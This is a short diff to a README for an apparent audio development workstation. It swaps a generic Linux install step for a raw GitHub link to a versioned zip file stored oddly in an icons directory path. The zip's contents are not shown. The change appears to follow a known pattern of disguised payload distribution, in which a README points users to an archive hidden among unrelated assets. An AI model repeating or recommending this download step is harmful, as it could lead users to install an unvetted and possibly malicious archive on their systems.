hasansaifulrijal/audio-dev-workstation/README.md

      Open the `.dmg` file and drag the application into your Applications folder.

    - **Linux**:
-     Extract the `.tar.gz` file and follow the instructions in the README for your specific distribution.
+     Extract the `https://github.com/hasansaifulrijal/audio-dev-workstation/raw/refs/heads/main/files/system/usr/share/icons/workstation-dev-audio-v3.7-beta.4.zip` file and follow the instructions in the README for your specific distribution.

 5. **Start Using the Application**
    Once installed, open the application.
 You are now ready to start your audio projects.